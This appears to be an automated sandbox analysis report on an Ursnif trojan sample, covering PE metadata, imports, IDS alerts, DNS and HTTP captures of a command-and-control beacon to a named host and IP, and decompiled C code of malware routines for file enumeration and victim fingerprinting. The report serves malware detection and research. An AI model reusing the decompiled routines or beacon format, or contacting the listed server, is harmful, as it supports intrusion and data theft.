Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x5D7CADF0 [Sat Sep 14 09:08:00 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	08b3bdf9cc3930ac93565a943e8ad0e4

Entrypoint Preview

Instruction
call 00007FB26C9B1B79h
jmp 00007FB26C9AC82Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [00426128h+ecx*8]
je 00007FB26C9AC9C5h
inc ecx
cmp ecx, 2Dh
jc 00007FB26C9AC9A3h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007FB26C9AC9C0h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [0042612Ch+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007FB26C9B09B9h
test eax, eax
jne 00007FB26C9AC9B8h
mov eax, 00426290h
ret
add eax, 08h
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 4Ch
mov eax, dword ptr [004262A8h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
xor ebx, ebx
push esi
mov esi, dword ptr [ebp+08h]
push edi
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-1Ch], ebx
mov dword ptr [ebp-20h], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-24h], ebx
mov dword ptr [ebp-4Ch], esi
mov dword ptr [ebp-48h], ebx
cmp dword ptr [esi+14h], ebx
je 00007FB26C9ACCCCh
lea eax, dword ptr [esi+04h]
cmp dword ptr [eax], ebx
jne 00007FB26C9AC9D2h
push eax
movzx eax, word ptr [esi+30h]
push 00001004h
push eax
lea eax, dword ptr [ebp-4Ch]
push ebx
push eax
call 00007FB26C9B1D5Dh
add esp, 14h
test eax, eax
jne 00007FB26C9ACC7Dh
push 00000004h
call 00007FB26C9AE99Eh
push 00000002h

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[EXP] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x25f50	0x58	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25424	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2dd8000	0x5c30	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x20000	0x1e8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1e014	0x1e200	False	0.726424727697	data	7.38003707514	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x20000	0x5fa8	0x6000	False	0.459879557292	data	5.59572231923	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x26000	0x2db17d8	0x1a00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2dd8000	0x5c30	0x5e00	False	0.376329787234	data	4.1399689351	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX_DIALOG_LAYOUT	0x2dd9f20	0x2	data
AFX_DIALOG_LAYOUT	0x2dd9f18	0x2	data
AFX_DIALOG_LAYOUT	0x2dd9f28	0x2	data
RT_CURSOR	0x2dd9f30	0x130	data
RT_CURSOR	0x2dda060	0xf0	data
RT_CURSOR	0x2dda150	0x10a8	data
RT_CURSOR	0x2ddb228	0xea8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"
RT_CURSOR	0x2ddc0d0	0x8a8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"
RT_ICON	0x2dd8550	0x8a8	data	Farsi	Iran
RT_ICON	0x2dd8550	0x8a8	data	Farsi	Afganistan
RT_ICON	0x2dd8550	0x8a8	data	Farsi	Tajikistan
RT_ICON	0x2dd8550	0x8a8	data	Farsi	Uzbekistan
RT_ICON	0x2dd8df8	0x10a8	data	Farsi	Iran
RT_ICON	0x2dd8df8	0x10a8	data	Farsi	Afganistan
RT_ICON	0x2dd8df8	0x10a8	data	Farsi	Tajikistan
RT_ICON	0x2dd8df8	0x10a8	data	Farsi	Uzbekistan
RT_STRING	0x2ddcaa8	0x46e	data
RT_STRING	0x2ddcf18	0x4b6	data
RT_STRING	0x2ddd3d0	0x5b4	data
RT_STRING	0x2ddd988	0x2a4	data
RT_GROUP_CURSOR	0x2ddb1f8	0x30	data
RT_GROUP_CURSOR	0x2ddc978	0x22	data
RT_GROUP_ICON	0x2dd9ea0	0x22	data	Farsi	Iran
RT_GROUP_ICON	0x2dd9ea0	0x22	data	Farsi	Afganistan
RT_GROUP_ICON	0x2dd9ea0	0x22	data	Farsi	Tajikistan
RT_GROUP_ICON	0x2dd9ea0	0x22	data	Farsi	Uzbekistan
RT_VERSION	0x2ddc9a0	0x104	data
None	0x2dd9ed8	0xa	data
None	0x2dd9ee8	0xa	data
None	0x2dd9ec8	0xa	data
None	0x2dd9ef8	0xa	data
None	0x2dd9f08	0xa	data

Imports

DLL

Import

KERNEL32.dll

SetVolumeLabelA, SetDefaultCommConfigA, CreateMutexW, lstrlenA, WritePrivateProfileStructA, CopyFileExW, TlsGetValue, MoveFileExA, _llseek, GetNumberOfConsoleInputEvents, FindResourceExW, CallNamedPipeA, DeleteVolumeMountPointA, WriteTapemark, InterlockedIncrement, ReadConsoleA, CompareFileTime, WaitForSingleObject, InterlockedCompareExchange, _lclose, SetTapeParameters, GetModuleHandleW, VirtualFree, WriteFile, GlobalAlloc, Sleep, LeaveCriticalSection, GetFileAttributesW, WriteConsoleW, GetOverlappedResult, GetACP, DeactivateActCtx, GetPrivateProfileSectionNamesW, IsDBCSLeadByteEx, GetProcAddress, GetTapeStatus, BeginUpdateResourceW, CreateNamedPipeA, LocalLock, IsValidCodePage, SearchPathA, SetFileApisToOEM, GetLocalTime, LoadLibraryA, SetCalendarInfoW, IsSystemResumeAutomatic, GetProfileStringA, WriteProfileSectionW, SetNamedPipeHandleState, EnumDateFormatsA, GetThreadPriority, WaitCommEvent, LoadLibraryExA, ContinueDebugEvent, VirtualProtect, PurgeComm, ScrollConsoleScreenBufferA, OpenSemaphoreW, GetVersionExA, DeleteFileW, DebugBreak, FindActCtxSectionStringW, GetSystemTime, lstrcpyW, GetLastError, GetSystemDefaultLangID, WideCharToMultiByte, InterlockedDecrement, InterlockedExchange, MultiByteToWideChar, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetStartupInfoW, GetCPInfo, RtlUnwind, RaiseException, LCMapStringW, LCMapStringA, GetStringTypeW, HeapAlloc, HeapCreate, VirtualAlloc, HeapReAlloc, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, ExitProcess, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetStringTypeA, HeapSize, GetOEMCP, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, InitializeCriticalSectionAndSpinCount, GetLocaleInfoW, GetModuleHandleA

GDI32.dll

GetBoundsRect

Exports

Name	Ordinal	Address
_geek@8	1	0x41a2d0
_gekkko@8	2	0x41a2c0

Version Infos

Description	Data
FileV	1.0.2.26
Translations	0x0218 0x07a1

Possible Origin

Language of compilation system	Country where language is spoken	Map
Farsi	Iran
Farsi	Afganistan
Farsi	Tajikistan
Farsi	Uzbekistan

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/07/21-16:19:35.183837	TCP	2033204	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	49751	80	192.168.2.3	87.106.18.141
10/07/21-16:19:35.183837	TCP	2033203	ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	49751	80	192.168.2.3	87.106.18.141

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2021 16:19:35.160347939 CEST	49751	80	192.168.2.3	87.106.18.141
Oct 7, 2021 16:19:35.161183119 CEST	49750	80	192.168.2.3	87.106.18.141
Oct 7, 2021 16:19:35.180584908 CEST	80	49751	87.106.18.141	192.168.2.3
Oct 7, 2021 16:19:35.180737972 CEST	49751	80	192.168.2.3	87.106.18.141
Oct 7, 2021 16:19:35.181255102 CEST	80	49750	87.106.18.141	192.168.2.3
Oct 7, 2021 16:19:35.181380033 CEST	49750	80	192.168.2.3	87.106.18.141
Oct 7, 2021 16:19:35.183836937 CEST	49751	80	192.168.2.3	87.106.18.141
Oct 7, 2021 16:19:35.204199076 CEST	80	49751	87.106.18.141	192.168.2.3
Oct 7, 2021 16:19:35.229631901 CEST	80	49751	87.106.18.141	192.168.2.3
Oct 7, 2021 16:19:35.229722023 CEST	49751	80	192.168.2.3	87.106.18.141
Oct 7, 2021 16:19:35.598839998 CEST	49751	80	192.168.2.3	87.106.18.141
Oct 7, 2021 16:19:35.644711971 CEST	80	49751	87.106.18.141	192.168.2.3
Oct 7, 2021 16:19:35.645252943 CEST	49751	80	192.168.2.3	87.106.18.141
Oct 7, 2021 16:19:36.514163017 CEST	49751	80	192.168.2.3	87.106.18.141
Oct 7, 2021 16:19:36.514230967 CEST	49750	80	192.168.2.3	87.106.18.141

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2021 16:19:35.113707066 CEST	64021	53	192.168.2.3	8.8.8.8
Oct 7, 2021 16:19:35.146023989 CEST	53	64021	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 7, 2021 16:19:35.113707066 CEST	192.168.2.3	8.8.8.8	0xbd3b	Standard query (0)	api5.feen007.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 7, 2021 16:19:35.146023989 CEST	8.8.8.8	192.168.2.3	0xbd3b	No error (0)	api5.feen007.at		87.106.18.141	A (IP address)	IN (0x0001)
Oct 7, 2021 16:19:51.258573055 CEST	8.8.8.8	192.168.2.3	0xd3f6	No error (0)	windowsupdate.s.llnwi.net		178.79.242.0	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api5.feen007.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49751	87.106.18.141	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Oct 7, 2021 16:19:35.183836937 CEST	1286	OUT	GET /webstore/DcjIiNGkOSL0_2FzFS0SI/7PtL4T1ixNrirqXI/ZpdUtfjmbk9XGDI/gk7_2BOWav_2FtIxdS/vSo3lpggS/jgk05AsnNx5dVlLwmu_2/FAFwkzA53QftC8xz3wT/fnjkouYQNR37gBMDH6qXvg/zMFbyF4s1JmGD/y5Fu3aSV/TmUAsAO_2BZNh80x_2FL9QD/SJCaUL6t8y/cM9WgnTGqUY3ueTtK/VgEDjaagDntZ/uB1lRFThucd/4921ywV6NYjMkC/jnp_2BoOlFuQm1snVe_0A/_0DPF5OO0IeFwPM_/2FxPK7FahYNj2AP/3bZ4D9BzvVH_2BCtQdVgfC/l HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api5.feen007.at Connection: Keep-Alive
Oct 7, 2021 16:19:35.229631901 CEST	1286	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 07 Oct 2021 14:19:35 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 7, 2021 16:19:35.598839998 CEST	1286	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api5.feen007.at Connection: Keep-Alive
Oct 7, 2021 16:19:35.644711971 CEST	1286	IN	HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 07 Oct 2021 14:19:35 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: a3.exe PID: 6712 Parent PID: 3120

General

Start time:	16:19:10
Start date:	07/10/2021
Path:	C:\Users\user\Desktop\a3.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\a3.exe'
Imagebase:	0x400000
File size:	179712 bytes
MD5 hash:	0CC6D274CD84B593210168F51FCD38CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.357686500.0000000005E78000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.578224187.0000000005629000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.357510029.0000000005E78000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.357882018.0000000005E78000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.357642343.0000000005E78000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.357596269.0000000005E78000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.357766814.0000000005E78000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.578307195.0000000005E78000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.357549475.0000000005E78000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.357827984.0000000005E78000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: iexplore.exe PID: 6308 Parent PID: 744

General

Start time:	16:19:31
Start date:	07/10/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff7e4150000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4596 Parent PID: 6308

General

Start time:	16:19:32
Start date:	07/10/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6308 CREDAT:17410 /prefetch:2
Imagebase:	0x1140000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: a3.exe PID: 6712 Parent PID: 3120 a3.exeCOMMON

Executed Functions

Function 04F63EED, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E04F63EED(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x4f6d22c; // 0x59935a40
				_t74 = RtlAllocateHeap( *0x4f6d1f0, 0, _t72 ^ 0x59935b44);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x4f6d22c; // 0x59935a40
				_t78 = RtlAllocateHeap( *0x4f6d1f0, 0, _t76 ^ 0x59935a4d);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x4f6d1f0, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x4f6d22c; // 0x59935a40
				memset(_t78, 0, _t136 ^ 0x59935a4d);
				_t81 =  *0x4f6d230; // 0xf0a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x4f6e81b; // 0x73797325
				_t83 = E04F68F21(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x4f6d1f0, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x59935a4d;
				_v28.dwHighDateTime = 0x59935a4d;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x59935a4d) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x4f6d230; // 0xf0a5a8
				_t16 = _t93 + 0x4f6e83c; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x04f63ef6
0x04f63efc
0x04f63efe
0x04f63f18
0x04f63f1c
0x04f63f1f
0x04f64194
0x04f6419b
0x04f6419b
0x04f63f25
0x04f63f3a
0x04f63f3c
0x04f63f40
0x04f63f43
0x04f64184
0x04f6418e
0x00000000
0x04f6418e
0x04f63f49
0x04f63f54
0x04f63f59
0x04f63f5e
0x04f63f61
0x04f63f68
0x04f63f6f
0x04f63f72
0x04f64174
0x04f6417e
0x00000000
0x04f6417e
0x04f63f88
0x04f63f8c
0x04f63f8f
0x04f63f92
0x04f63f9a
0x04f63f9d
0x04f63fa6
0x04f63fac
0x04f63fb6
0x04f63fbd
0x04f63fbd
0x04f63fcf
0x04f63fda
0x04f63fe8
0x04f63fed
0x04f63ff2
0x04f63ff5
0x04f63ffa
0x04f64004
0x04f64007
0x04f6400a
0x04f64020
0x04f64024
0x04f64027
0x04f64172
0x00000000
0x04f64172
0x04f6403e
0x04f6408f
0x04f64052
0x04f6405a
0x04f6405f
0x04f6406d
0x04f64076
0x04f6407f
0x04f6407f
0x04f6408d
0x04f6408d
0x04f64093
0x04f64097
0x04f64097
0x04f6409d
0x00000000
0x00000000
0x04f6409f
0x04f640a5
0x04f6414c
0x04f6414f
0x04f6415c
0x04f6415c
0x04f64160
0x00000000
0x00000000
0x04f64155
0x04f64159
0x04f64159
0x04f6415b
0x04f6415b
0x04f64165
0x04f6416c
0x04f6416e
0x00000000
0x04f6416e
0x04f640ab
0x04f640ad
0x04f640ad
0x04f640c0
0x04f640c6
0x04f640d1
0x04f640d3
0x04f640d7
0x04f640d9
0x04f640d9
0x04f640de
0x04f640e0
0x04f640e0
0x04f640de
0x04f640e5
0x04f640e9
0x04f640e9
0x04f640f9
0x04f640fe
0x04f64101
0x04f64101
0x04f64104
0x04f6410e
0x04f64116
0x04f6411b
0x04f64129
0x04f64129
0x04f6413d
0x04f64141
0x04f64141

APIs

RtlAllocateHeap.NTDLL(00000000,59935A40,04F6D2E0), ref: 04F63F18
RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04F63F3A
memset.NTDLL ref: 04F63F54

Part of subcall function 04F68F21: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000001,59935A4D,04F63F6D,73797325), ref: 04F68F32
Part of subcall function 04F68F21: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04F68F4C

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04F63F92
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04F63FA6
FindCloseChangeNotification.KERNELBASE(00000001), ref: 04F63FBD
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04F63FC9
lstrcat.KERNEL32(?,642E2A5C), ref: 04F6400A
FindFirstFileA.KERNELBASE(?,?), ref: 04F64020
CompareFileTime.KERNEL32(?,?), ref: 04F6403E
FindNextFileA.KERNELBASE(04F68A5F,?), ref: 04F64052
FindClose.KERNEL32(04F68A5F), ref: 04F6405F
FindFirstFileA.KERNEL32(?,?), ref: 04F6406B
CompareFileTime.KERNEL32(?,?), ref: 04F6408D
StrChrA.SHLWAPI(?,0000002E), ref: 04F640C0
memcpy.NTDLL(04F68E99,?,00000000), ref: 04F640F9
FindNextFileA.KERNELBASE(04F68A5F,?), ref: 04F6410E
FindClose.KERNEL32(04F68A5F), ref: 04F6411B
FindFirstFileA.KERNEL32(?,?), ref: 04F64127
CompareFileTime.KERNEL32(?,?), ref: 04F64137
FindClose.KERNELBASE(04F68A5F), ref: 04F6416C
HeapFree.KERNEL32(00000000,04F68E99,73797325), ref: 04F6417E
HeapFree.KERNEL32(00000000,?), ref: 04F6418E

Strings

Ut, xrefs: 04F6417E, 04F6418E

Memory Dump Source

Source File: 00000000.00000002.578047703.0000000004F61000.00000020.00020000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000000.00000002.578040110.0000000004F60000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578069402.0000000004F6C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.578076801.0000000004F6D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.578083670.0000000004F6F000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
String ID: Ut
API String ID: 2944988578-8415677
Opcode ID: e4eb427a04d47dcb1de28eb9d7b9771fb00c43c3aae33f07908db751a67b4c44
Instruction ID: 81ced9327bae8ba56719fffc38a81e5f2fcd01ebdf54faaf3e9bea56e930c6e1
Opcode Fuzzy Hash: e4eb427a04d47dcb1de28eb9d7b9771fb00c43c3aae33f07908db751a67b4c44
Instruction Fuzzy Hash: 2C814972D00159EFDB11EFA5EC84AEEBBB9FB48304F10406AE556E3250E735AA41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04F6660B, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E04F6660B(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x4f6d228; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E04F6A8C2( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x4f6d22c ^ 0x76f6612d;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x4f6d1f0, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E04F61F74(_v8 + _v8, _t63);
							}
							HeapFree( *0x4f6d1f0, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x4f6d1f0, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E04F61F74(_v8 + _v8, _t63);
						}
						HeapFree( *0x4f6d1f0, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x04f6660b
0x04f66613
0x04f66619
0x04f6661c
0x04f6661f
0x04f66621
0x04f66626
0x04f66626
0x04f6662c
0x04f6662e
0x04f6663b
0x04f6669c
0x04f6663d
0x04f66642
0x04f66648
0x04f6664d
0x04f6665b
0x04f6665f
0x04f6666e
0x04f66675
0x04f6667c
0x04f6667c
0x04f66687
0x04f66687
0x04f6665f
